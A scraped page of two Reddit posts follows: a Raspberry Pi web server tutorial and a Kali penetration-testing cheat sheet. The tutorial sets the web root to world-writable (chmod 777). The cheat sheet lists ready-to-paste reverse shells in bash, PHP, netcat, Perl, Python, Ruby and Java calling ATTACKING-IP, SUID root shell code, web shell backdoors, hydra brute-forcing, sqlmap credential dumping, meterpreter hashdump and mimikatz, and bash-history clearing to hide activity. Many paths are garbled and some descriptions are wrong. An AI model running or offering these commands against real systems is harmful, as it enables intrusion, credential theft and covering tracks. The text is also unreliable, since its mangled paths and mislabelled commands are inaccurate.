To be able to control raspberry over the SSH, we first need to set up the pi. Make sure your PC and your pi are connected on the same network. Connect your pi to the monitor, plug in keyboard and a mouse. Open up terminal and type "sudo raspi-config". Go to "Advanced Settings" and enable SSH. Type "ifconfig" to terminal and mark down your inet address. Now reboot your pi(sudo reboot -f). You can unplug everything except for the miniUSB cable now.
If you are Windows user, download putty and run it. Leave everything as it is, just type your raspberry pi´s IP address to the "Host Name" input. Click open. Default login credentials -> login: "pi", password:"raspberry".
It is highly reccomended to change your password, so noone can access your pi over the SSH. You do this by typing "passwd" and entering your new password when prompted
In this step we are going to install programs that we need in order to be able to run a web server. I am not going to go into the detail here, i think you can understand what is going on, just type these commands into the terminal, one by one.
sudo apt-get update sudo apt-get install apache2 php5 libapache2-mod-php5 sudo apt-get install apache2 php5 libapache2-mod-php5 sudo service apache2 restart sudo apt-get install mysql-server mysql-client php5-mysql 
Your site should be up by now. Try it by typing your raspberry pi´s IP adress into the website bar in your web browser. You should see basic apache page confirming it is all installed. Now we need to change some permissions so we can edit server files later.
cd /va sudo chmod 777 www 
Now this one is a bit tricky. You have to figure it yourself because everyone´s routers are different. Open up cmd and type "ipconfig". You will see your default gateway IP adress. Copy this address and paste it to your web browser. Create a new port forwarding rule on port 80 with both protocols as a traffic type. Name it as you want and in the "IP Adress" field just type your pi´s IP adress. This is how it looks on my router. click here to see screenshot
Save the changes and you are good to go!
We will be using noip for this one. It is a service that offers you free domains for your IP addresses. Sign up and you will see your dashboard. On the left side you can see "Dynamic DNS". Click that. Now click on "add hostname". Select your own unique hostname and domain that you will be connecting to. This is basically gonna be your page URL. Fill that out and let IPv4 Adress as it is. Click on add a hostname. If there are no errors, we shall continue to the last step.
In this last step, we need to install no-ip service on our Pi that will (lets say) basically connect domain URL and your pi´s web server. I wont go into much detail, just type these commands into the raspberry pi´s terminal one by one as we already did before.
cd /uslocal/src/ sudo wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz tar xf noip-duc-linux.tar.gz sudo rm noip-duc-linux.tar.gz cd noip-2.1.9-1/ sudo make install 
Enter your no-ip email and password to finish the installation process when propted to do so. Now, if everything went well, we should be able to access our pi´s web server on your own URL from anywhere in the world. One last thing we need to do is to make sure no-ip runs everytime we reboot the pi. We can do this by simply typing in the terminal following commands:
cd /etc/ sudo nano rc.local 
add "sudo noip2" line to the rc.local file and press CTRL+X to save it. Now just reboot the pi and it should all be working.
sudo reboot -f 
You can connect to the pi using WINSCP for example and edit website´s files. Your imagination has no borders now, you can do whatever you want and share it with whoever you want.
I hope this tutorial helped some of you that have been wondering how to set up pi as a web server. As I already said, I just turned 15 and am not from English-speaking country and neither am I close to one. There will surely be many people that know more about this topic and will find some mistakes in my post, but I did my best trying to explain what I know.
Thanks for reading.
yeah and by the way This website is currently running on my Pi - I did it for two users, but making a full-length tutorial is probably a better idea.
submitted by 4bidden1337 to raspberry_pi [link] [comments]

2016.06.25 12:27 LubuntuFU noob friendly notes part 2

Recon and Enumeration

nmap -v -sS -A -T4 target - Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p--A -T4 target - As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target - As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X - Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover

SMB enumeration

ls /usshare/nmap/scripts/* grep ftp - Search nmap scripts for keywords
nbtscan - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing


nbtscan -v - Displays the nbtscan version
nbtscan -f target(s) - This shows the full NBT resource record responses for each machine scanned, not a one line summary, use this options when scanning a single host
nbtscan -O file-name.txt target(s) - Sends output to a file
nbtscan -H - Generate an HTTP header
nbtscan -P - Generate Perl hashref output, which can be loaded into an existing program for easier processing, much easier than parsing text output
nbtscan -V - Enable verbose mode
nbtscan -n - Turns off this inverse name lookup, for hanging resolution
nbtscan -p PORT target(s) - This allows specification of a UDP port number to be used as the source in sending a query
nbtscan -m - Include the MAC (aka "Ethernet") addresses in the response, which is already implied by the -f option.

Other Host Discovery

netdiscover -r - Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site

SMB Enumeration

nbtscan - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Python Local Web Server

python -m SimpleHTTPServer 80 - Run a basic http server, great for serving up shells etc

Mounting File Shares

mount /mnt/nfs - Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs - Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \win-server\share password /user:domain\janedoe /savecred /p:no - Mount a Windows share on Windows from the command line
apt-get install smb4k -y - Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic Finger Printing

nc -v 25 - telnet 25 - Basic versioning / finger printing via displayed banner

SNMP Enumeration

nmpcheck -t 192.168.1.X -c public snmpwalk -c public -v1 192.168.1.X 1 grep hrSWRunName cut -d* * -f
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts

DNS Zone Transfers

nslookup -> set type=any -> ls -d blah.com - Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com - Linux DNS zone transfer


dnsrecon -d TARGET -D /usshare/wordlists/dnsmap.txt -t std --xml ouput.xml

HTTP / HTTPS Webserver Enumeration

nikto -h - Perform a nikto scan against target
dirbuster - Configure via GUI, CLI input doesn't work most of the time

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0 - tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

python /usshare/doc/python-impacket-doc/examples /samrdump.py 192.168.XXX.XXX - Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt - RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

snmpwalk public -v1 192.168.X.XXX 1 grep cut -d” “ -f4 - Enmerate users from SNMP
python /usshare/doc/python-impacket-doc/examples/ samrdump.py SNMP 192.168.X.XXX - Enmerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep) - Search for SNMP servers with nmap, grepable output


/usshare/wordlists - Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

hydra -l USERNAME -P /usshare/wordlistsnmap.lst -f 192.168.X.XXX ftp -V - Hydra FTP brute force

Hydra POP3 Brute Force

hydra -l USERNAME -P /usshare/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V - Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usshare/wordlistsnmap.lst 192.168.X.XXX smtp -V - Hydra SMTP brute force

Password Cracking

John The Ripper - JTR
john --wordlist=/usshare/wordlists/rockyou.txt hashes - JTR password cracking
john --format=descrypt --wordlist /usshare/wordlists/rockyou.txt hash.txt - JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show - JTR forced descrypt brute force cracking

Exploit Research

searchsploit windows 2003 grep -i local - Search exploit-db for exploit, in this example windows 2003 + local esc
site:exploit-db.com exploit kernel <= 3 - Use google to search exploit-db.com for exploits
grep -R "W7" /usshare/metasploit-framework /modules/exploit/windows/* - Search metasploit modules using grep - msf search sucks a bit

Linux Penetration Testing Commands

Linux Network Commands

netstat -tulpn - Show Linux network ports with process ID's (PIDs)
watch ss -stplu - Watch TCP, UDP open ports in real time with socket summary.
lsof -i - Show established connections.
macchanger -m MACADDR INTR - Change MAC address on KALI Linux.
ifconfig eth0 - Set IP address in Linux.
ifconfig eth0:1 - Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR - Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500 - Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x - Dig reverse lookup on an IP address.
host - Reverse lookup on an IP address, in case dig is not installed.
dig @ domain.com -t AXFR - Perform a DNS zone transfer using dig.
host -l domain.com nameserver - Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x - Get hostname for IP address.
ip addr add dev eth0 - Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host google.com - Blocks access to google.com from the host machine.
echo "1" > /proc/sys/net/ipv4/ip_forward - Enables IP forwarding, turns Linux box into a router - handy for routing traffic through a box.
echo "" > /etc/resolv.conf - Use Google DNS.

System Information Commands

Useful for local enumeration.

whoami - Shows currently logged in user on Linux.
id - Shows currently logged in user and groups for the user.
last - Shows last logged in users.
mount - Show mounted drives.
df -h - Shows disk usage in human readable output.
echo "user:passwd" chpasswd - Reset password in one line.
getent passwd - List users on Linux.
strings /uslocal/bin/blah - Shows contents of none text files, e.g. whats in a binary.
uname -ar - Shows running kernel version.
PATH=$PATH:/my/new-path - Add a new PATH, handy for local FS manipulation.
history - Show bash history, commands the user has entered previously.

Redhat / CentOS / RPM Based Distros

cat /etc/redhat-release - Shows Redhat / CentOS version number.
rpm -qa - List all installed RPM's on an RPM based Linux distro.
rpm -q --changelog openvpn - Check installed RPM is patched against CVE, grep the output for CVE.

YUM Commands

Package manager used by RPM based systems, you can pull #some usefull information about installed packages and #or install additional tools.

yum update - Update all RPM packages with YUM, also shows whats out of date.
yum update httpd - Update individual packages, in this example HTTPD (Apache).
yum install package - Install a package using YUM.
yum --exclude=package kernel* update - Exclude a package from being updates with YUM.
yum remove package - Remove package with YUM.
yum erase package - Remove package with YUM.
yum list package - Lists info about yum package.
yum provides httpd - What a packages does, e.g Apache HTTPD Server.
yum info httpd - Shows package info, architecture, version etc.
yum localinstall blah.rpm - Use YUM to install local RPM, settles deps from repo.
yum deplist package - Shows deps for a package.
yum list installed more - List all installed packages.
yum grouplist more - Show all YUM groups.
yum groupinstall 'Development Tools' - Install YUM group.

Debian / Ubuntu / .deb Based Distros

cat /etc/debian_version - Shows Debian version number.
cat /etc/*-release - Shows Ubuntu version number.
dpkg -l - List all installed packages on Debian / .deb based Linux distro. Linux User Management
useradd new-user - Creates a new Linux user.
passwd username - Reset Linux user password, enter just passwd if you are root.
deluser username - Remove a Linux user.

Linux Decompression Commands

How to extract various archives (tar, zip, gzip, bzip2 #etc) on Linux and some other tricks for searching #inside of archives etc.

unzip archive.zip - Extracts zip file on Linux.
zipgrep *.txt archive.zip - Search inside a .zip archive.
tar xf archive.tar - Extract tar file Linux.
tar xvzf archive.tar.gz - Extract a tar.gz file Linux.
tar xjf archive.tar.bz2 - Extract a tar.bz2 file Linux.
tar ztvf file.tar.gz grep blah - Search inside a tar.gz file.
gzip -d archive.gz - Extract a gzip file Linux.
zcat archive.gz - Read a gz file Linux without decompressing.
zless archive.gz - Same function as the less command for .gz archives.
zgrep 'blah' /valog/maillog*.gz - Search inside .gz archives on Linux, search inside of compressed log files.
vim file.txt.gz - Use vim to read .txt.gz files (my personal favorite).
upx -9 -o output.exe input.exe - UPX compress .exe file Linux.

Linux Compression Commands

zip -r file.zip /di* - Creates a .zip file on Linux.
tar cf archive.tar files - Creates a tar file on Linux.
tar czf archive.tar.gz files - Creates a tar.gz file on Linux.
tar cjf archive.tar.bz2 files - Creates a tar.bz2 file on Linux.
gzip file - Creates a file.gz file on Linux.

Linux File Commands

df -h blah - Display size of file / dir Linux.
diff file1 file2 - Compare / Show differences between two files on Linux.
md5sum file - Generate MD5SUM Linux.
md5sum -c blah.iso.md5 - Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah - Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix - Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file - Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file - Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file - Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf - Remove files and directories without prompting for confirmation.

Samba Commands

Connect to a Samba share from Linux.

$ smbmount //serveshare /mnt/win -o user=username,password=password1 $ smbclient -U user \\server\share $ mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

Breaking Out of Limited Shells

Credit to G0tmi1k for these (or wherever he stole them from!).

The Python trick:

python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i

Misc Commands

init 6 - Reboot Linux from the command line.
gcc -o output.c input.c - Compile C code.
gcc -m32 -o output.c input.c - Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTORYFILE - Disable bash history logging.
rdesktop X.X.X.X - Connect to RDP server from Linux.
kill -9 $$ - Kill current session.
chown user:group blah - Change owner of file or dir.
chown -R user:group blah - Change owner of file or dir and all underlying files / dirs - recersive chown.
chmod 600 file - Change file / dir permissions, see Linux File System Permissons for details.
Clear bash history - $ ssh [email protected] cat /dev/null > ~/.bash_history

Linux File System Permissions

777 rwxrwxrwx No restriction, global WRX any user can do anything.
755 rwxr-xr-x Owner has full access, others can read and execute the file.
700 rwx------ Owner has full access, no one else has access.
666 rw-rw-rw- All users can read and write but not execute.
644 rw-r--r-- Owner can read and write, everyone else can read.
600 rw------- Owner can read and write, everyone else has no access.

Linux File System

/ - also know as "slash" or the root.
/bin - Common programs, shared by the system, the system administrator and the users.
/boot - Boot files, boot loader (grub), kernels, vmlinuz
/dev - Contains references to system devices, files with special properties.
/etc - Important system config files.
/home - Home directories for system users.
/lib - Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found - Files that were saved during failures are here.
/mnt - Standard mount point for external file systems.
/media - Mount point for external file systems (on some distros).
/net - Standard mount point for entire remote file systems - nfs.
/opt - Typically contains extra and third party software.
/proc - A virtual file system containing information about system resources.
/root - root users home dir.
/sbin - Programs for use by the system and the system administrator.
/tmp - Temporary space for use by the system, cleaned upon reboot.
/usr -Programs, libraries, documentation etc. for all user-related programs.
/var - Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler. Web servers, Databases etc.

Linux Interesting Files / Dir’s

Places that are worth a look if you are attempting to #privilege escalate / perform post exploitation.

Directory Description

/etc/passwd - Contains local Linux users.
/etc/shadow - Contains local account password hashes.
/etc/group - Contains local account groups.
/etc/init.d/ - Contains service init script - worth a look to see whats installed.
/etc/hostname - System hostname.
/etc/network/interfaces - Network interfaces.
/etc/resolv.conf - System DNS servers.
/etc/profile - System environment variables.
~/.ssh/ - SSH keys.
~/.bash_history - Users bash history log.
/valog/ - Linux system log files are typically stored here.
/vaadm/ - UNIX system log files are typically stored here.
/valog/apache2/access.log & /valog/httpd/access.log - Apache access log file typical path.
/etc/fstab - File system mounts.

Compiling Exploits

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.
process.h, string.h, winbase.h, windows.h, winsock2.h - Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h - Linux exploit code

Build Exploit GCC

gcc -o exploit exploit.c - Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

gcc -m32 exploit.c -o exploit - Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe - Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell #as a superuser, you can update the UID / GID and shell #as required.

below are some quick copy and pate examples for #various #shells:

SUID C Shell for /bin/bash

int main(void){ setresuid(0, 0, 0); system("/bin/bash"); }

SUID C Shell for /bin/sh

int main(void){ setresuid(0, 0, 0); system("/bin/sh"); }

Building the SUID Shell binary

gcc -o suid suid.c
gcc -m32 -o suid suid.c - for 32bit

Setup Listening Netcat

Your remote shell will need a listening netcat instance #in order to connect back.

Set your Netcat listening shell on an allowed port

Use a port that is likely allowed via outbound firewall #rules on the target network, e.g. 80 / 443

To setup a listening netcat instance, enter the #following:

[email protected]:~# nc -nvlp 80 nc: listening on :: 80 ... nc: listening on 80 ...

NAT requires a port forward

If you're attacking machine is behing a NAT router, #you'll need to setup a port forward to the attacking #machines IP / Port.

ATTACKING-IP is the machine running your listening #netcat session, port 80 is used in all examples below #(for reasons mentioned above).

Bash Reverse Shells

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 while read line; do $line 2>&5 >&5; done


while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

PHP Reverse Shell

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)
Netcat Reverse Shell
nc -e /bin/sh ATTACKING-IP 80
/bin/sh nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 /bin/bash telnet ATTACKING-IP 443

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk Reverse Shell

!/usbin/gawk -f

BEGIN { Port = 8080 Prompt = "bkd> "
 Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt & Service Service & getline cmd if (cmd) { while ((cmd & getline) > 0) print $0 & Service close(cmd) } } while (cmd != "exit") close(Service) } 

Kali Web Shells

The following shells exist within Kali Linux, under /#usshare/webshells/ these are only useful if you are #able to upload, inject or transfer the shell to the #machine.

Kali PHP Web Shells

/usshare/webshells/php/php-reverse-shell.php - Pen Test Monkey - PHP Reverse Shell
/usshare/webshells/php/findsock.c - Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindfull of the target servers architecture), execute with netcat not a browser nc -v target 80
/usshare/webshells/php/simple-backdoor.php - PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
/usshare/webshells/php/php-backdoor.php - Larger PHP shell, with a text input box for command execution.

Tip: Executing Reverse Shells

The last two shells above are not reverse shells, #however they can be useful for executing a reverse #shell.

Kali Perl Reverse Shell

/usshare/webshells/perl/perl-reverse-shell.pl - Pen Test Monkey - Perl Reverse Shell
/usshare/webshells/perl/perlcmd.cgi - Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

/usshare/webshells/cfm/cfexec.cfm - Cold Fusion Shell - aka CFM Shell

Kali ASP Shell

/usshare/webshells/asp/ - Kali ASP Shells

Kali ASPX Shells

/usshare/webshells/aspx/ - Kali ASPX Shells

Kali JSP Reverse Shell

/usshare/webshells/jsp/jsp-reverse.jsp - Kali JSP Reverse Shell

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell #in Linux, useful for running commands like su from #reverse shells.

Python TTY Shell Trick - python -c 'import pty;pty.spawn("/bin/bash")' - echo os.system('/bin/bash')
Spawn Interactive sh shell - /bin/sh -i
Spawn Perl TTY Shell - exec "/bin/sh"; perl —e 'exec "/bin/sh";'
Spawn Ruby TTY Shell - exec "/bin/sh"
Spawn Lua TTY Shell - os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi: - :!bash
Spawn TTY Shell NMAP - !sh

SSH Port Forwarding

ssh -L 9999: [email protected] - Port 9999 locally is forwarded to port 445 on through host

SSH Port Forwarding with Proxychains

ssh -D [email protected] - Dynamically allows all port forwards to the subnets availble on the target.

Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpretereverse_tcp - Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp set ViewOnly false - Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

set payload linux/meterpretereverse_tcp - Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

upload file - c:\windows
Meterpreter upload file to Windows target - download c:\windows\repair\sam /tmp
Meterpreter download file from Windows target - download c:\windows\repair\sam /tmp
Meterpreter download file from Windows target - execute -f c:\windows\temp\exploit.exe
Meterpreter run .exe on target - handy for executing uploaded exploits
execute -f cmd -c - Creates new channel with cmd shell
ps - Meterpreter show processes
shell - Meterpreter get shell on the target
getsystem - Meterpreter attempts priviledge escalation the target
hashdump - Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target - Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target - Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapi - MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi - MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index - MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac - Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

use auxiliary/scannehttp/dir_scanner - Metasploit HTTP directory scanner
use auxiliary/scannehttp/jboss_vulnscan - Metasploit JBOSS vulnerability scanner
use auxiliary/scannemssql/mssql_login - Metasploit MSSQL Credential Scanner
use auxiliary/scannemysql/mysql_version - Metasploit MSSQL Version Scanner
use auxiliary/scanneoracle/oracle_login - Metasploit Oracle Login Module

Metasploit Powershell Modules

use exploit/multi/script/web_delivery - Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell - Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer - Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload - Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

run post/windows/gathewin_privs - Metasploit show privileges of current user
use post/windows/gathecredentials/gpp - Metasploit grab GPP saved passwords
load mimikatz -> wdigest - Metasplit load Mimikatz
run post/windows/gathelocal_admin_search_enum - Idenitfy other machines that the supplied domain user has administrative access to

CISCO IOS Commands

A collection of useful Cisco IOS commands.

enable - Enters enable mode
conf t - Short for, configure terminal
(config)# interface fa0/0 - Configure FastEthernet 0/0
(config-if)# ip addr - Add ip to fa0/0
(config-if)# ip addr - Add ip to fa0/0
(config-if)# line vty 0 4 - Configure vty line
(config-line)# login - Cisco set telnet password
(config-line)# password YOUR-PASSWORD - Set telnet password

show running-config - Show running config loaded in memory

show startup-config - Show sartup config

show version - show cisco IOS version

show session - display open sessions

show ip interface - Show network interfaces

show interface e0 - Show detailed interface info

show ip route - Show routes

show access-lists - Show access lists

dir file systems - Show available files

dir all-filesystems - File information

dir /all - SHow deleted files

terminal length 0 - No limit on terminal output

copy running-config tftp - Copys running config to tftp server

copy running-config startup-config - Copy startup-config to running-config


Hash Lengths

MD5 Hash Length - 16 Bytes
SHA-1 Hash Length - 20 Bytes
SHA-256 Hash Length - 32 Bytes
SHA-512 Hash Length - 64 Bytes

SQLMap Examples

sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 - Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/vawww/blah.php" - Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump - Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" --forms - sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump - sqlmap dump and crack hashes for table users on database-name
submitted by LubuntuFU to Kalilinux [link] [comments]